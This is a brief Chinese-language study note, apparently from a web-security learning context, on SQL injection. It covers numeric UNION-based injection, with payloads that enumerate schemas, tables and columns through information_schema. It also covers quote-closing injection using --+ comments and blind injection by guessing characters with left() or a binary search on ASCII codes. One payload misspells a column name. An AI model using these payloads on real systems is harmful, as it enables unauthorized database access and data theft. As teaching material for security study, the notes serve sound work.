1.数字型注入

Id = 1  此id需要数字型,那么就很简单,直接输入id=1 union ___就可以直接实现后面的sql语句进行执行

?id=1 union select group_concat(schema_name) from information_schema.schemata 
?id=1 union select group_concat(table_name) from information_schema.tables 
Where table_schema=‘’
?id=1 union select group_concat(colunmn_name) from information_schema.columns where table_name=‘'

2.没有过滤符号导致的注入

(1)' ' 第一种单引号型

(2) " " 第二种双引号型

(3) (' ')第三种括号单引号型

总之这些注入方式都是大同小异的,基本思想就是把左侧符号提前收尾,右侧符号通过--+进行注释

3.手工盲注

这种注入方式,基本的特点就是:在输入正确的操作时会显示一句话,失败时就不会出现,和上面的区别就是一个可以直接回显,一个不能直接回显

所以,在这个过程我们看不到回显,所以我们把这种方式叫做盲注

方法:使用left函数进行库名猜测,或者直接使用二分法猜测目标asii码

这里使用burn或者python脚本都是可以直接猜测库名的